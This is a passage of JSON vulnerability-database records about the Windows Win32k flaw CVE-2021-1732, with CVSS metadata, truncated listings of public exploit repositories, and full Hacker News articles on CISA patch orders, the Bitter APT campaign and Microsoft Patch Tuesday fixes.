"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-06-13T06:40:53", "id": "91A5BC48-2410-555B-B7FB-8138577D6B78", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:55:12", "description": "# CVE-2021-1732-Exploit\nCVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-05T02:11:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-08-15T15:41:27", "id": "02C6FE13-5036-5BE5-8AC8-278A918BA581", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T16:12:24", "description": "<h1 style=\"font-size:10vw\" align=\"center\">Windows Privilege Esca...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-25T12:55:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-06-10T10:41:19", "id": "5E516DC2-BF71-57D0-9A87-3874146D0F83", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-09T08:09:06", "description": "# CVE-2021-1732\nCVE-\u00ad2021\u00ad-1732 Microsoft Windows 10 \u672c\u5730\u63d0\u6743\u6f0f \u7814\u7a76\u53caPo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-09T07:14:45", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2023-03-09T07:15:31", "id": "87746757-7ADF-518B-8EA1-A11AC7E420FC", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-09T08:27:55", "description": "# CVE-2021-1732\nCVE-\u00ad2021\u00ad-1732 Microsoft Windows 10 \u672c\u5730\u63d0\u6743\u6f0f \u7814\u7a76\u53caPo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-01T13:06:17", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2023-03-09T07:13:06", "id": "237105AA-3579-5C91-BC0F-55BF93EC18DD", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "thn": [{"lastseen": "2022-05-09T12:37:35", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhOB2VqcpzvIvbqWJmlBkCMLbnUxk3Z5xT2z3m3Gq-YuuBlN_NqdLRsokokD3U-FEY86UgsPht9jJl64elkaTldrF5sP92LWMSa6SiRtCYAh531p1yOcpxfIcK7KxbUiT4AcuUBJjXXV-KoHFwXcRxhZiXlPt_nDcSDmlAdw1IQJzBJ_AKFxIs-zvlV>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging federal agencies to secure their systems against an actively exploited security vulnerability in Windows that could be abused to gain elevated permissions on affected hosts.\n\nTo that end, the agency has added [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) (CVSS score: 7.0) to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), necessitating that Federal Civilian Executive Branch (FCEB) agencies patch all systems against this vulnerability by February 18, 2022.\n\n\"These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise,\" CISA [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/04/cisa-adds-one-known-exploited-vulnerability-catalog>) in an advisory published last week.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEi_i5GcfQrAT38f9axbzmFO-Sp4pa-68-q21bq9ALE0pr3rtd7YlA1XdpzF_M0ipJE_4ckPGcdP2bX7xhUeQIbU_JpRuDg5QbRJrTDOpgnI3EmoXugjloJtH_JOaWEeDDLiPE54NUuVokjdewdmpU6RxL1iBbRgZKIod0B73dVQnznjvTQNCy2MQ0sf>)\n\n[CVE-2022-21882](<https://github.com/L4ys/CVE-2022-21882>), which has been tagged with an \"Exploitation More Likely\" exploitability index assessment, concerns a case of elevation of privilege vulnerability affecting the Win32k component. The bug was addressed by Microsoft as part of its January 2022 [Patch Tuesday](<https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html>) updates.\n\n\"A local, authenticated attacker could gain elevated local system or administrator privileges through a vulnerability in the Win32k.sys driver,\" the Windows maker said. The flaw impacts Windows 10, Windows 11, Windows Server 2019, and Windows server 2022.\n\nIt's worth noting that the [security vulnerability](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-21882.html>) is also a [bypass](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) for another escalation of privilege flaw in the same module ([CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>), CVSS score: 7.8) that Microsoft resolved in [February 2021](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) and has since been detected in [exploits in the wild](<https://www.cisa.gov/uscert/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T05:03:00", "type": "thn", "title": "CISA Orders Federal Agencies to Patch Actively Exploited Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-07T05:03:44", "id": "THN:012EBB2FE2687F178FBCC3AB8ABEF778", "href": "https://thehackernews.com/2022/02/cisa-orders-federal-agencies-to-patch.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T02:22:45", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgx6lZB3oJ9X1sLlKCznoOeSkcDGdxDDzLpQUslIFxcqcdMH_UDcAqH4PjZiqkCxL4jI-B00Zx79nco8uEEf5XiuDqkexKPHK5G1oPT3v5UXngC8t4QHYPLfIhQTOw0d5FZR2WUXYg38_ydmYOd8biQq4tgAK_UHmsEyzslVH8sLV19IMC1QE6NMR95/s728-e100/hacker-code.jpg>)\n\nAn espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021.\n\nCybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the [Bitter APT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat>) based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.\n\n\"Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including [China](<https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations>), Pakistan, and Saudi Arabia,\" Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, [told](<https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html>) The Hacker News.\n\n\"And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise.\"\n\nBitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hacking group motivated primarily by intelligence gathering, an operation that's facilitated by means of malware such as BitterRAT, ArtraDownloader, and AndroRAT. Prominent targets include the energy, engineering, and government sectors.\n\nThe earliest attacks distributing the mobile version of BitterRAT date back to September 2014, with the actor having a history of leveraging zero-day flaws \u2014 [CVE-2021-1732](<https://blog.cyble.com/2021/02/24/bitter-apt-enhances-its-capability-with-windows-kernel-zero-day-exploit/>) and [CVE-2021-28310](<https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html>) \u2014 to its advantage and accomplishing its adversarial objectives.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEje8jC-uVfJtCg-HT90ER0XL1ynji-bMSmKY4TsMgVZDJ4BUis2Ee9BqhaK1IgRgN3C39Ble5vyCaoUWCWOSw_sCPSi1K1pqxhfFDtU7-XFOlKQELXIUmacfXYgeFx_YhnGNvj-1DRRGm2mRliJTxxHv8CqVxw48P0ghcuKJ0YObfTzh23rHBy_Bz3i/s728-e100/talos.jpg>)\n\nThe latest campaign, targeting an elite entity of the Bangladesh government, involves sending spear-phishing emails to high-ranking officers of the Rapid Action Battalion Unit of the Bangladesh police (RAB).\n\nAs is typically observed in other social engineering attacks of this kind, the missives are designed to lure the recipients into opening a weaponized RTF document or a Microsoft Excel spreadsheet that exploits previously known flaws in the software to deploy a new trojan dubbed \"ZxxZ.\"\n\nZxxZ, named so after a separator used by the malware when sending information back to the C2 server, is a 32-bit Windows executable compiled in Visual C++.\n\n\"The trojan masquerades as a Windows Security update service and allows the malicious actor to perform remote code execution, allowing the attacker to perform any other activities by installing other tools,\" the researchers explained.\n\nWhile the malicious RTF document exploits a memory corruption vulnerability in Microsoft Office's Equation Editor ([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>)), the Excel file abuses two remote code execution flaws, [CVE-2018-0798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0798>) and [CVE-2018-0802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0802>), to activate the infection sequence.\n\n\"Actors often change their tools to avoid detection or attribution, this is part of the lifecycle of a threat actor showing its capability and determination,\" Ventura said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T12:37:00", "type": "thn", "title": "Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2022-05-12T01:27:46", "id": "THN:75586AE52D0AAF674F942498C96A2F6A", "href": "https://thehackernews.com/2022/05/bitter-apt-hackers-add-bangladesh-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:21", "description": "[](<https://thehackernews.com/images/-YROWoUQuY8Q/YHZ1yLhkJGI/AAAAAAAACQw/rmFTIz73mk81DI0P2vG2MpkxtMrT5jqbgCLcBGAsYHQ/s0/windows-update-smb-flaw.jpg>)\n\nIn its April slate of patches, Microsoft rolled out fixes for a total of [114 security flaws](<https://msrc-blog.microsoft.com/2021/04/13/april-2021-update-tuesday-packages-now-available/>), including an actively exploited zero-day and four remote code execution bugs in Exchange Server.\n\nOf the [114 flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Apr>), 19 are rated as Critical, 88 are rated Important, and one is rated Moderate in severity.\n\nChief among them is [CVE-2021-28310](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28310>), a privilege escalation vulnerability in Win32k that's said to be under active exploitation, allowing attackers to elevate privileges by running malicious code on a target system. \n\nCybersecurity firm Kaspersky, which discovered and reported the flaw to Microsoft in February, linked the zero-day exploit to a threat actor named Bitter APT, which was found exploiting a similar flaw ([CVE-2021-1732](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>)) in attacks late last year.\n\n\"It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access,\" Kaspersky researcher Boris Larin [said](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>).\n\n## NSA Found New Bugs Affecting Exchange Server\n\nAlso fixed by Microsoft are four remote code execution (RCE) flaws (CVE-2021-28480 through CVE-2021-28483) affecting [on-premises Exchange Servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-april-2021-exchange-server-security-updates/ba-p/2254617>) 2013, 2016, and 2019 that were reported to the company by the U.S. National Security Agency (NSA). Two of the code execution bugs are unauthenticated and require no user interaction, and carry a CVSS score of 9.8 out of a maximum of 10.\n\n[](<https://thehackernews.com/images/-8FoY65fokvw/YHZ2L3VP2bI/AAAAAAAACQ4/krAsXabe1VgmdxN0j2h4MtXElmsH8ApJACLcBGAsYHQ/s0/microsoft-exchnage.jpg>)\n\nWhile the Windows maker said it had found no evidence of any active exploits in the wild, it's recommended that customers install these updates as soon as possible to secure the environment, particularly in light of the widespread Exchange Server hacks last month and new findings that attackers are attempting to leverage the [ProxyLogon](<https://thehackernews.com/2021/03/proxylogon-exchange-poc-exploit.html>) exploit to [deploy malicious cryptominers](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) onto Exchange Servers, with the payload being hosted on a compromised Exchange Server.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also [revised](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/13/apply-microsoft-april-2021-security-update-mitigate-newly>) the emergency directive it issued last month, stating \"these vulnerabilities pose an unacceptable risk to the Federal enterprise and require an immediate and emergency action,\" while cautioning that the underlying flaws can be weaponized by reverse-engineering the patch to create an exploit.\n\nCybersecurity firm Check Point, which has been tracking ongoing cyber threats exploiting the Exchange Server flaws, said a total of 110,407 attacks have been prevented targeting government, manufacturing, finance, healthcare, legal, and insurance industries in the U.S., U.K., Germany, Netherlands, and Brazil.\n\n## FBI Removed Backdoors From Hacked MS Exchange servers\n\nWhat's more, the U.S. Federal Bureau of Investigation (FBI) carried out a \"successful action\" to \"copy and remove\" web shells planted by adversaries on hundreds of victim computers using the ProxyLogon flaws. The FBI is said to have wiped the web shells that were installed by Hafnium that could have been used to maintain and escalate persistent, unauthorized access to U.S. networks.\n\n\"The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),\" the Justice Department [said](<https://www.justice.gov/usao-sdtx/pr/justice-department-announces-court-authorized-effort-disrupt-exploitation-microsoft>) in a statement detailing the court-authorized operation.\n\n## 27 RCE Flaws in Windows RPC and Other Fixes\n\nMicrosoft also said four additional vulnerabilities were publicly known at the time of release but not exploited \u2014\n\n * CVE-2021-28458 - Azure ms-rest-nodeauth Library Elevation of Privilege Vulnerability\n * CVE-2021-27091 - RPC Endpoint Mapper Service Elevation of Privilege Vulnerability\n * CVE-2021-28437 - Windows Installer Information Disclosure Vulnerability\n * CVE-2021-28312 - Windows NTFS Denial of Service Vulnerability\n\nIn addition, April's Patch Tuesday update also addresses a whopping 27 RCE flaws in Remote Procedure Call (RPC) runtime, a Hyper-V security feature bypass vulnerability (CVE-2021-28444), and multiple privilege escalation flaws in Windows Speech Runtime, Windows Services and Controller App, Windows Secure Kernel Mode, Windows Event Tracing, and Windows Installer.\n\n## Software Patches From Other Vendors\n\nBesides Microsoft, a number of other vendors have also released a slew of patches on Tuesday \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>) (security updates for Photoshop, Digital Editions, RoboHelp, and Bridge)\n * [DELL](<https://www.dell.com/support/security/en-in>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-April/date.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=573801649>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-14T04:58:00", "type": "thn", "title": "NSA Discovers New Vulnerabilities Affecting Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-27091", "CVE-2021-28310", "CVE-2021-28312", "CVE-2021-28437", "CVE-2021-28444", "CVE-2021-28458", "CVE-2021-28480", "CVE-2021-28483"], "modified": "2021-04-15T05:57:31", "id": "THN:F163C7AB35BEF8E28924E14B02752181", "href": "https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:08", "description": "[](<https://thehackernews.com/images/-pOCXw5Vbz4E/YCNjQpEwYHI/AAAAAAAABuA/DON2kef7nngGbrXuKE_q5XlYxFXBjgnbQCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on Tuesday [issued fixes for 56 flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Feb>), including a critical vulnerability that's known to be actively exploited in the wild.\n\nIn all, 11 are listed as Critical, 43 are listed as Important, and two are listed as Moderate in severity \u2014 six of which are previously disclosed vulnerabilities.\n\nThe updates cover .NET Framework, Azure IoT, Microsoft Dynamics, Microsoft Edge for Android, Microsoft Exchange Server, Microsoft Office, Microsoft Windows Codecs Library, Skype for Business, Visual Studio, Windows Defender, and other core components such as Kernel, TCP/IP, Print Spooler, and Remote Procedure Call (RPC).\n\n### A Windows Win32k Privilege Escalation Vulnerability\n\nThe most critical of the flaws is a Windows Win32k privilege escalation vulnerability (CVE-2021-1732, CVSS score 7.8) that allows attackers with access to a target system to run malicious code with elevated permissions. Microsoft credited JinQuan, MaDongZe, TuXiaoYi, and LiHao of DBAPPSecurity for discovering and reporting the vulnerability.\n\nIn a separate technical write-up, the researchers said a zero-day exploit leveraging the flaw was detected in a \"very limited number of attacks\" against victims located in China by a threat actor named Bitter APT. The attacks were discovered in December 2020.\n\n\"This zero-day is a new vulnerability which caused by win32k callback, it could be used to escape the sandbox of Microsoft [Internet Explorer] browser or Adobe Reader on the latest Windows 10 version,\" DBAPPSecurity researchers [said](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>). \"The vulnerability is high quality and the exploit is sophisticated.\"\n\nIt's worth noting that Adobe, as part of its February patch, [addressed](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>) a critical buffer overflow flaw in Adobe Acrobat and Reader for Windows and macOS (CVE-2021-21017) that it said could lead to arbitrary code execution in the context of the current user.\n\nThe company also warned of active exploitation attempts against the bug in the wild in limited attacks targeting Adobe Reader users on Windows, mirroring aforementioned findings from DBAPPSecurity.\n\nWhile neither Microsoft nor Adobe has provided additional details, the concurrent patching of the two flaws raises the possibility that the vulnerabilities are being chained to carry out the in-the-wild attacks.\n\n### Netlogon Enforcement Mode Goes Into Effect\n\nMicrosoft's Patch Tuesday update also resolves a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-24078), .NET Core, and Visual Studio (CVE-2021-26701), Microsoft Windows Codecs Library (CVE-2021-24081), and Fax Service (CVE-2021-1722 and CVE-2021-24077).\n\nThe RCE in Windows DNS server component is rated 9.8 for severity, making it a critical vulnerability that, if left unpatched, could permit an unauthorized adversary to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nMicrosoft is also taking this month to push second round of fixes for the [Zerologon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) flaw (CVE-2020-1472) that was originally resolved in August 2020, following which [reports of active exploitation](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) targeting unpatched systems emerged in September 2020.\n\nStarting February 9, the domain controller \"[enforcement mode](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>)\" will be [enabled by default](<https://support.microsoft.com/help/4557222#EnablingEnforcementMode>), thus blocking \"vulnerable [Netlogon] connections from non-compliant devices.\"\n\nIn addition, the Patch Tuesday update rectifies two information disclosure bugs \u2014 one in Edge browser for Android (CVE-2021-24100) that could have revealed personally identifiable information and payment information of a user, and the other in Microsoft Teams for iOS (CVE-2021-24114) that could have exposed the Skype token value in the preview URL for images in the app.\n\n### RCE Flaws in Windows TCP/IP Stack\n\nLastly, the Windows maker released a set of fixes affecting its TCP/IP implementation \u2014 consisting of two RCE flaws (CVE-2021-24074 and CVE-2021-24094) and one denial of service vulnerability (CVE-2021-24086) \u2014 that it said could be exploited with a DoS attack.\n\n\"The DoS exploits for these CVEs would allow a remote attacker to cause a stop error,\" Microsoft [said](<https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/>) in an advisory. \"Customers might receive a blue screen on any Windows system that is directly exposed to the internet with minimal network traffic. Thus, we recommend customers move quickly to apply Windows security updates this month.\"\n\nThe tech giant, however, noted that the complexity of the two TCP/IP RCE flaws would make it hard to develop functional exploits. But it expects attackers to create DoS exploits much more easily, turning the security weakness into an ideal candidate for exploitation in the wild.\n\nTo install the latest security updates, Windows users can head to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-02-10T04:44:00", "type": "thn", "title": "Microsoft Issues Patches for In-the-Wild 0-day and 55 Others Windows Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 